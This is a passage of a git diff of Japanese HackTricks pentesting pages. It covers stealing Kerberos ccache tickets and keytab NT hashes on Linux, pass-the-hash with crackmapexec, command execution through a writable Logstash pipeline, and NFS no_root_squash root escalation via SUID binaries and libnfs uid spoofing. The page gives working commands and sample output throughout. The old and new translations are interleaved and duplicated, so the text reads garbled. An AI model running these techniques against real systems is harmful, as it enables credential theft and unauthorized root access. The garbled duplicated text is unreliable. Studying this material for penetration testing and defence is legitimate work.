{% content-ref url="../../windows-hardening/active-directory-methodology/pass-the-ticket.md" %}
[pass-the-ticket.md](../../windows-hardening/active-directory-methodology/pass-the-ticket.md)
{% endcontent-ref %}
### /tmpからのCCACHEチケット再利用
### /tmpからのCCACHEチケット再利用
> チケットがディスク上のファイルとして保存される場合、標準の形式とタイプはCCACHEファイルです。これは、Kerberos資格情報を保存するためのシンプルなバイナリファイル形式です。これらのファイルは通常、/tmpに保存され、600のアクセス許可でスコープが設定されます。
CCACHEファイルは、通常、`/tmp`内で600の権限で保存される**Kerberos資格情報を格納するバイナリ形式**です。これらのファイルは、ユーザーのUIDに対応する**名前形式`krb5cc_%{uid}`**で識別できます。認証チケットの検証には、環境変数`KRB5CCNAME`を希望のチケットファイルのパスに設定する必要があり、その再利用が可能になります。
`env | grep KRB5CCNAME`を使用して、現在の認証に使用されているチケットをリストします。形式はポータブルであり、環境変数を設定することでチケットを**再利用**できます。`export KRB5CCNAME=/tmp/ticket.ccache`として環境変数を設定します。Kerberosチケット名の形式は`krb5cc_%{uid}`であり、uidはユーザーのUIDです。
認証に使用されている現在のチケットをリストアップするには、`env | grep KRB5CCNAME`を使用します。形式はポータブルであり、環境変数を設定することでチケットを再利用できます。`export KRB5CCNAME=/tmp/ticket.ccache`として環境変数を設定します。Kerberosチケットの名前形式は`krb5cc_%{uid}`であり、uidはユーザーのUIDです。
```bash
# Find tickets
ls /tmp/ | grep krb5cc
krb5cc_1000
krb5cc_1569901113
krb5cc_1569901115
export KRB5CCNAME=/tmp/krb5cc_1569901115
# Prepare to use it
export KRB5CCNAME=/tmp/krb5cc_1000
```
### キーリングからのCCACHEチケット再利用
### キーリングからのCCACHEチケット再利用
プロセスは**自身のメモリ内にKerberosチケットを保存**することがあります。このツールは、それらのチケットを抽出するのに役立ちます(マシンの`/proc/sys/kernel/yama/ptrace_scope`でptrace保護が無効になっている必要があります: [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
**プロセスのメモリに保存されたKerberosチケットは抽出可能**であり、特にマシンのptrace保護が無効になっている場合(`/proc/sys/kernel/yama/ptrace_scope`)。この目的のために便利なツールは[https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)で見つけることができ、セッションにインジェクトして`/tmp`にチケットをダンプすることで抽出を容易にします。
このツールを構成して使用するために、以下の手順に従います:
```bash
# Configuration and build
git clone https://github.com/TarlogicSecurity/tickey
cd tickey/tickey
make CONF=Release
[root@Lab-LSV01 /]# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in tarlogic[1000] session...
[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
[*] Trying to inject in velociraptor[1120601115] session...
[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
[*] Trying to inject in trex[1120601113] session...
[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
[X] [uid:0] Error retrieving tickets
/tmp/tickey -i
```
### SSSD KCMからのCCACHEチケットの再利用
この手順では、さまざまなセッションにインジェクトを試み、抽出されたチケットを `/tmp``__krb_UID.ccache` の命名規則で保存して成功を示します。
SSSDは、パス`/var/lib/sss/secrets/secrets.ldb`にデータベースのコピーを保持しています。対応するキーは、パス`/var/lib/sss/secrets/.secrets.mkey`に隠しファイルとして保存されています。デフォルトでは、このキーは**root**権限を持っている場合にのみ読み取ることができます。
### SSSD KCM からの CCACHE チケット再利用
`SSSDKCMExtractor`を`--database`と`--key`パラメータと共に呼び出すと、データベースを解析し、**秘密情報を復号化**します。
SSSD は、パス `/var/lib/sss/secrets/secrets.ldb` にデータベースのコピーを維持します。対応するキーは、パス `/var/lib/sss/secrets/.secrets.mkey` に隠しファイルとして保存されます。デフォルトでは、このキーは **root** 権限を持っている場合にのみ読み取り可能です。
\*\*`SSSDKCMExtractor` \*\* を --database と --key パラメータと共に呼び出すと、データベースを解析し、秘密情報を **復号** します。
```bash
git clone https://github.com/fireeye/SSSDKCMExtractor
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```
**クレデンシャルキャッシュのKerberosブロブは、Mimikatz/Rubeusに渡すことができる使用可能なKerberos CCacheファイルに変換できます。**
**資格情報キャッシュKerberos blobは、Mimikatz/Rubeusに渡すことができる使用可能なKerberos CCacheファイルに変換できます。**
### キータブからのCCACHEチケット再利用
### キータブからのCCACHEチケット再利用
```bash
git clone https://github.com/its-a-feature/KeytabParser
python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
```
### /etc/krb5.keytabからアカウントを抽出する
### /etc/krb5.keytab からアカウントを抽出する
通常、rootとして実行されるサービスのサービスキーは、**`/etc/krb5.keytab`**というキータブファイルに保存されます。このサービスキーは、サービスのパスワードと同等であり、安全に保管する必要があります。
ルート権限で動作するサービスに必要なサービスアカウントキーは、**`/etc/krb5.keytab`** ファイルに安全に保存されています。これらのキーは、サービスのパスワードに類似し、厳格な機密性が求められます。
[`klist`](https://adoptopenjdk.net/?variant=openjdk13\&jvmVariant=hotspot)を使用してキータブファイルを読み取り、その内容を解析します。キータイプが23の場合に表示されるキーは、実際の**ユーザーのNTハッシュ**です。
Keytab ファイルの内容を調査するには、**`klist`** を使用できます。このツールは、**NT ハッシュ**を含むキーの詳細を表示するよう設計されており、特にキーの種類が 23 と識別された場合には、ユーザー認証に使用されます。
```bash
klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab
# Output includes service principal details and the NT Hash
```
klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
[...]
[26] Service principal: host/COMPUTER@DOMAIN
KVNO: 25
Key type: 23
Key: 31d6cfe0d16ae931b73c59d7e0c089c0
Time stamp: Oct 07, 2019 09:12:02
[...]
```
Linuxでは、[`KeyTabExtract`](https://github.com/sosdave/KeyTabExtract)を使用することができます。RC4 HMACハッシュを再利用するために必要です。
Linuxユーザーにとって、**`KeyTabExtract`**はRC4 HMACハッシュを抽出する機能を提供し、NTLMハッシュの再利用に活用できます。
```bash
python3 keytabextract.py krb5.keytab
[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck
[+] Keytab File successfully imported.
REALM : DOMAIN
SERVICE PRINCIPAL : host/computer.domain
NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky
# Expected output varies based on hash availability
```
**macOS**では、[**`bifrost`**](https://github.com/its-a-feature/bifrost)を使用することができます。
macOSでは、**`bifrost`** はkeytabファイルの解析ツールとして機能します。
```bash
./bifrost -action dump -source keytab -path test
./bifrost -action dump -source keytab -path /path/to/your/file
```
CMEを使用して、アカウントとハッシュを使用してマシンに接続します。
抽出されたアカウントとハッシュ情報を利用して、**`crackmapexec`**などのツールを使用してサーバーへの接続を確立できます。
```bash
$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN"
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN"
```
## 参考文献
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
* [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを入手してください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私をフォローしてください **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

570
linux-hardening/privilege-escalation/linux-capabilities.md
View file

File diff suppressed because it is too large Load diff

67
linux-hardening/privilege-escalation/logstash.md
View file

@ -1,28 +1,28 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **githubリポジトリに提出してください。**
</details>
# 基本情報
## Logstash
Logstashは、ログの収集、変換、出力に使用されます。これは、入力、フィルター、出力モジュールを含む**パイプライン**を使用して実現されます。サービスは、Logstashをサービスとして実行しているマシンが侵害された場合に興味深くなります。
Logstashは、**パイプライン**として知られるシステムを介してログを**収集、変換、送信**するために使用されます。これらのパイプラインは、**入力**、**フィルタ**、および**出力**の段階で構成されます。Logstashが侵害されたマシンで動作する場合、興味深い側面が生じます。
## パイプライン
### パイプラインの構成
パイプライン設定ファイル **/etc/logstash/pipelines.yml** は、アクティブなパイプラインの場所を指定します:
```bash
# This file is where you define your pipelines. You can define multiple.
# For more information on multiple pipelines, see the documentation:
パイプラインは、**/etc/logstash/pipelines.yml**ファイルで構成され、パイプライン構成の場所がリストされています。
```yaml
# Define your pipelines here. Multiple pipelines can be defined.
# For details on multiple pipelines, refer to the documentation:
# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html
- pipeline.id: main
@ -31,23 +31,21 @@ path.config: "/etc/logstash/conf.d/*.conf"
path.config: "/usr/share/logstash/pipeline/1*.conf"
pipeline.workers: 6
```
以下には、設定されたパイプラインを含む **.conf** ファイルへのパスが記載されています。**Elasticsearch 出力モジュール**が使用されている場合、**パイプライン**にはElasticsearchインスタンスの有効な**資格情報**が含まれる可能性が高いです。LogstashはElasticsearchにデータを書き込む必要があるため、これらの資格情報はしばしばより多くの権限を持っています。ワイルドカードが使用されている場合、Logstashはそのフォルダ内のワイルドカードに一致するすべてのパイプラインを実行しようとします。
このファイルでは、パイプライン構成を含む **.conf** ファイルがどこにあるかが明らかにされています。**Elasticsearch出力モジュール**を使用する際、**パイプライン**には通常、Elasticsearchのデータ書き込みが必要なLogstashのために広範な権限を持つことがよくあります。構成パス内のワイルドカードを使用すると、Logstashは指定されたディレクトリ内のすべての一致するパイプラインを実行できます。
## 書き込み可能なパイプラインを使った権限昇格
### 書き込み可能なパイプラインを通じた特権昇格
自分の権限を昇格させる前に、logstashサービスを実行しているユーザーを確認する必要があります。なぜなら、その後そのユーザーを所有することになるからです。デフォルトでは、logstashサービスは**logstash**ユーザーの権限で実行されます。
特権昇格を試みるには、まずLogstashサービスが実行されているユーザーを特定します。通常は **logstash** ユーザーです。次のいずれかの条件を満たしていることを確認してください:
以下のいずれかの必要な権限を持っているか確認してください:
- パイプライン **.conf** ファイルに **書き込みアクセス権** がある **または**
- **/etc/logstash/pipelines.yml** ファイルがワイルドカードを使用しており、対象のフォルダに書き込むことができる
* パイプラインの **.conf** ファイルに**書き込み権限**がある **または**
* **/etc/logstash/pipelines.yml** にワイルドカードが含まれており、指定されたフォルダに書き込む権限がある
さらに、次のいずれかの条件を満たしている必要があります:
さらに、以下の要件の**いずれか**を満たす必要があります:
- Logstashサービスを再起動できる権限がある **または**
- **/etc/logstash/logstash.yml** ファイルに **config.reload.automatic: true** が設定されている
* logstashサービスを再起動できる **または**
* **/etc/logstash/logstash.yml** に **config.reload.automatic: true** のエントリが含まれている
ワイルドカードが指定されている場合、そのワイルドカードに一致するファイルを作成してみてください。以下の内容をファイルに書き込むことでコマンドを実行できます:
構成内にワイルドカードがある場合、このワイルドカードに一致するファイルを作成すると、コマンドを実行できます。たとえば:
```bash
input {
exec {
@ -63,11 +61,10 @@ codec => rubydebug
}
}
```
**インターバル**は秒単位で指定します。この例では、**whoami** コマンドが120秒ごとに実行されます。コマンドの出力は **/tmp/output.log** に保存されます。
ここでは、**interval** は実行頻度(秒単位)を決定します。与えられた例では、**whoami** コマンドが120秒ごとに実行され、その出力は **/tmp/output.log** に向けられます。
もし **/etc/logstash/logstash.yml** に **config.reload.automatic: true** のエントリが含まれている場合、Logstashは新しいパイプライン設定ファイルや既存のパイプライン設定の変更を自動的に認識するので、コマンドが実行されるまで待つだけです。そうでない場合は、logstashサービスを再起動してトリガーしてください
**/etc/logstash/logstash.yml** に **config.reload.automatic: true** があると、Logstash は新しいまたは変更されたパイプライン構成を自動的に検出して適用し、再起動を必要としません。ワイルドカードがない場合、既存の構成に変更を加えることはできますが、障害を回避するために注意が必要です
ワイルドカードが使用されていない場合、既存のパイプライン設定にこれらの変更を適用することができます。**物事を壊さないように注意してください!**
# 参考文献
@ -76,14 +73,14 @@ codec => rubydebug
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには、</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)** でゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの**会社を広告したい、または**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)をチェックしてください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローしてください。**
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを**共有してください。**
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする。
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出して、あなたのハッキングテクニックを共有してください。
</details>

70
linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
View file

@ -1,31 +1,31 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する
* **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
</details>
_ **/etc/exports** _ ファイルを読み、**no\_root\_squash**として設定されているディレクトリがあれば、クライアントとして**アクセス**し、そのディレクトリ内にローカルの**root**であるかのように**書き込む**ことができます。
_ **/etc/exports** _ ファイルを読み取り、**no\_root\_squash** として構成されたディレクトリがある場合、**クライアントとして**そのディレクトリに**アクセス**し、そのディレクトリ内に**ローカルのrootであるかのように書き込む**ことができます。
**no\_root\_squash**: このオプションは、クライアントのrootユーザーにNFSサーバー上のファイルにrootとしてアクセスする権限を与えます。これにより、深刻なセキュリティ上の問題が発生する可能性があります。
**no\_root\_squash**: このオプションは、クライアントのrootユーザーにNFSサーバー上のファイルにアクセスする権限を与えます。これにより、深刻なセキュリティ上の問題が発生する可能性があります。
**no\_all\_squash:** これは**no\_root\_squash**オプションに似ていますが、**非rootユーザー**に適用されます。例えば、nobodyユーザーとしてシェルを持っていて、/etc/exportsファイルをチェックし、no\_all\_squashオプションが存在する場合、/etc/passwdファイルをチェックし、非rootユーザーをエミュレートし、そのユーザーとしてsuidファイルを作成しますnfsを使用してマウントする。nobodyユーザーとしてsuidを実行し、別のユーザーになります。
**no\_all\_squash:** これは**no\_root\_squash** オプションにていますが、**非rootユーザー**に適用されます。例えば、nobodyユーザーとしてシェルを取得した場合、/etc/exportsファイルを確認し、no\_all\_squashオプションが存在する場合、/etc/passwdファイルを確認し、非rootユーザーをエミュレートし、そのユーザーとしてsuidファイルを作成しますNFSを使用してマウント。 nobodyユーザーとしてsuidを実行し、異なるユーザーになります。
# 権昇格
# 権昇格
## リモートエクスプロイト
この脆弱性を見つけた場合、次のように利用できます:
この脆弱性を見つけた場合、次のように悪用できます:
* クライアントマシンでそのディレクトリを**マウント**し、マウントされたフォルダ内に**/bin/bash**バイナリをrootとして**コピー**し、**SUID**権限を与え、被害者のマシンからそのbashバイナリを**実行**します。
* クライアントマシンでそのディレクトリを**マウント**し、**rootとして**マウントされたフォルダ内に**/bin/bash**バイナリをコピーし、それに**SUID権限**を付与し、被害者のマシンからそのbashバイナリを実行します。
```bash
#Attacker, as root user
mkdir /tmp/pe
@ -38,7 +38,7 @@ chmod +s bash
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell
```
* クライアントマシンでそのディレクトリを**マウントし**、ルートとしてマウントされたフォルダ内にコンパイルされたペイロードを**コピーし**、それに**SUID**権限を与え、被害者のマシンからそのバイナリを**実行します**(こちらでいくつかの[C SUIDペイロード](payloads-to-execute.md#c)を見つけることができます)。
* **クライアントマシンでそのディレクトリをマウント**し、マウントされたフォルダ内に、SUID権限を悪用する私たちのコンパイル済みペイロードをコピーして、それにSUID権限を与え、被害者のマシンからそのバイナリを実行しますここで[C SUID payloads](payloads-to-execute.md#c)を見つけることができます)。
```bash
#Attacker, as root user
gcc payload.c -o payload
@ -55,37 +55,37 @@ cd <SHAREDD_FOLDER>
## ローカルエクスプロイト
{% hint style="info" %}
自分のマシンから被害者のマシンへの**トンネルを作成できる場合は、必要なポートをトンネリングしてこの特権昇格をリモートバージョンで利用することができます**。\
次のトリックは、ファイル `/etc/exports` が**IPアドレスを指定している**場合に関するものです。この場合、**リモートエクスプロイトは**いかなる場合でも**使用できません**し、このトリックを**悪用する必要があります**。\
エクスプロイトが機能するためのもう一つの必要条件は、`/etc/export` 内の**エクスポートが `insecure` フラグを使用していることです**。\
\--_`/etc/export` がIPアドレスを指している場合、このトリックが機能するかどうかは確信がありません_--
自分のマシンから被害者のマシンへのトンネルを作成できる場合、引き続き必要なポートをトンネリングすることで、この特権昇格を悪用するリモートバージョンを使用できます。\
次のトリックは、`/etc/exports` ファイルがIPを示している場合です。この場合、リモートエクスプロイトを使用することはできず、このトリックを悪用する必要があります。\
エクスプロイトが機能するための別の必要条件は、`/etc/export` 内のエクスポートが `insecure` フラグを使用している必要があることです。\
\--_`/etc/export` がIPアドレスを示している場合、このトリックが機能するかどうかはわかりません_--
{% endhint %}
## 基本情報
このシナリオでは、ローカルマシンにマウントされたNFS共有を悪用し、クライアントがそのuid/gidを指定できるNFSv3仕様の欠陥を利用して、許可されていないアクセスを可能にします。悪用には、NFS RPCコールの偽造を可能にする[libnfs](https://github.com/sahlberg/libnfs)というライブラリを使用します。
シナリオは、ローカルマシン上のマウントされたNFS共有を悪用し、NFSv3仕様の欠陥を利用してクライアントがuid/gidを指定できるようにすることで、権限のないアクセスを可能にします。エクスプロイトには、NFS RPC呼び出しの偽造を可能にするライブラリである[libnfs](https://github.com/sahlberg/libnfs)を使用します。
### ライブラリのコンパイル
ライブラリのコンパイル手順は、カーネルバージョンに基づいて調整が必要な場合があります。この特定のケースでは、fallocateシステムコールがコメントアウトされていました。コンパイルプロセスには以下のコマンドが含まれます:
ライブラリのコンパイル手順は、カーネルバージョンに基づいて調整が必要な場合があります。この特定のケースでは、fallocateシステムコールがコメントアウトされていました。コンパイルプロセスには、次のコマンドが含まれます:
```bash
./bootstrap
./configure
make
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
```
### エクスプロイトの実施
### 攻撃の実行
このエクスプロイトは、root権限を昇格させるシンプルなCプログラム (`pwn.c`) を作成し、シェルを実行することを含みます。プログラムはコンパイルされ、結果のバイナリ (`a.out`) が suid rootで共有に配置されます。`ld_nfs.so` を使用して RPC コールで uid を偽装します:
攻撃には、特権をrootに昇格させ、シェルを実行する単純なCプログラム`pwn.c`)を作成します。プログラムをコンパイルし、生成されたバイナリ(`a.out`を、RPC呼び出しでuidを偽装するためにsuid rootで共有に配置します。
1. **エクスプロイトコードをコンパイルする:**
1. **攻撃コードをコンパイルする:**
```bash
cat pwn.c
int main(void){setreuid(0,0); system("/bin/bash"); return 0;}
gcc pwn.c -o a.out
```
2. **共有にエクスプロイトを配置し、uidを偽装してその権限を変更する:**
2. **攻撃を共有に配置し、uidを偽装してアクセス権を変更する:**
```bash
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
@ -93,14 +93,14 @@ LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs:
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out
```
3. **root権限を得るためにエクスプロイトを実行する:**
3. **root権限を取得するために攻撃を実行する:**
```bash
/mnt/share/a.out
#root
```
## ボーナス: ステルスなファイルアクセスのための NFShell
rootアクセスを取得したら、所有権を変更せずに痕跡を残さないようにNFS共有と対話するために、Pythonスクリプト (nfsh.py) を使用します。このスクリプトは、アクセスされるファイルのuidに合わせてuidを調整し、共有上のファイルと権限の問題なく対話することを可能にします
## ボーナス: NFShellによる機密ファイルアクセス
rootアクセスを取得した後、所有権を変更せずにNFS共有とやり取りするために、Pythonスクリプトnfsh.pyが使用されます。このスクリプトは、アクセスされるファイルのuidを調整し、許可の問題なく共有内のファイルとやり取りできるようにします。
```python
#!/usr/bin/env python
# script from https://www.errno.fr/nfs_privesc.html
@ -125,19 +125,19 @@ os.system(' '.join(sys.argv[1:]))
drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
```
# 参考文献
* https://www.errno.fr/nfs_privesc.html
* [https://www.errno.fr/nfs_privesc.html](https://www.errno.fr/nfs_privesc.html)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
